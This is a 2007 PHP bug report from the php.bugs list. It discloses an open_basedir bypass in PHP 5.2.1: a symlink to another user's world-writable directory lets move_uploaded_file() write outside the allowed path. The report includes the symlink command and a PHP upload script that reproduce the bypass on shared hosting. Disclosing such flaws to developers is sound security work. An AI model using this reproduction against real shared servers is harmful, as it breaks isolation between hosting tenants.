#40931 [NEW]: open_basedir bypass via symlink and move_uploaded_file()
| From: | vladimir at petrov dot ks dot ua | Date: | Tue, 27 Mar 2007 18:30:13 +0000 |
| Subject: | #40931 [NEW]: open_basedir bypass via symlink and move_uploaded_file() | ||
| Groups: | php.bugs | ||
| Request: | Send a blank email to php-bugs+get-110847@lists.php.net to get a copy of this message | ||
From: vladimir at petrov dot ks dot ua
Operating system: Linix
PHP version: 5.2.1
PHP Bug Type: Safe Mode/open_basedir
Bug description: open_basedir bypass via symlink and move_uploaded_file()
Description:
------------
User can bypass open_basedir restriction by move_uploaded_file() if target
file path is symlink to any directory.
Reproduce code:
---------------
user1 will upload file to user2's /home/user2/public_html folder.
We have in /etc/passwd:
user1:x:32001:32001::/home/user1:/bin/bash
user2:x:32002:32002::/home/user2:/bin/bash
Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/
Apache have mod_php intalled. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
ServerName user1.xxxxxxx.com
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"
</VirtualHost>
User user1 can do something like:
$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>
<?
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
echo "ok";
else echo "failed";
}
?>
<form name="uplform" method="post" action="<?=$PHP_SELF?>"
enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</body></html>' > upload.php
Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php
after file upload
expected message
"Upload failed"
and no file
/home/user2/public_html/file.ext
in target folder.
Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php
after file upload we got
message
"Upload ok"
and file
/home/user2/public_html/file.ext
well exist in target folder.
--
Edit bug report at http://bugs.php.net/?id=40931&edit=1
--
Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=40931&r=trysnapshot44
Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=40931&r=trysnapshot52
Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=40931&r=trysnapshot60
Fixed in CVS: http://bugs.php.net/fix.php?id=40931&r=fixedcvs
Fixed in release: http://bugs.php.net/fix.php?id=40931&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=40931&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=40931&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=40931&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=40931&r=support
Expected behavior: http://bugs.php.net/fix.php?id=40931&r=notwrong
Not enough info: http://bugs.php.net/fix.php?id=40931&r=notenoughinfo
Submitted twice: http://bugs.php.net/fix.php?id=40931&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=40931&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=40931&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=40931&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=40931&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=40931&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=40931&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=40931&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=40931&r=mysqlcfg